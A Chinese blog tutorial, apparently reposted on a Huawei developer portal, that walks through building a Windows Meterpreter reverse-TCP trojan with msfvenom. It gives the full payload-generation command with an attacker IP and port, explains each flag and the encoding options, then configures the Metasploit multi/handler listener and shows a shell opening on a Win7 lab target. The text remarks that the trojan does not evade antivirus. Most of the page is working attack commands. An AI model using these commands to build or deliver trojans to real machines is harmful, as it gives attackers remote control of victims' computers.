命令:

废话不多说,直接上命令:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe

命令

命令分解:

				msfvenom     #使用msf中msfvenom模块
				-a	       #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适)
				-p 		#指定payload(攻击载荷)
				lhost,lport:	#指定shell返回的地址与端口
				-f 			#指定生成格式
				-o 		#指定生成位置与名称
				拓展:
				-e 		#指定编码器
				-i 			#指定编码次数
				--platform 	#指定平台

配置监听

### kali开启msf
命令:msfconsole

msf

开启后门监听

命令:use exploit/multi/handler
hander

查看需要配置什么

命令:show options
在这里插入图片描述

配置payload,lhost,lport

命令:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.166
(payload,lhost,lport要与木马相同,这里端口号与我们制作木马时相同,就不需要在设置了,设置完建议再查看一下配置)
在这里插入图片描述

执行监听

命令:exploit
在这里插入图片描述

将木马发送到win7靶机,并双击执行

(靶机要关闭防火墙,制作的的木马是没有免杀的,就算用了msf自带的编码也不能绕过杀软)
在这里插入图片描述
链接成功!!执行ipconfig试一下
在这里插入图片描述
执行成功!!

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐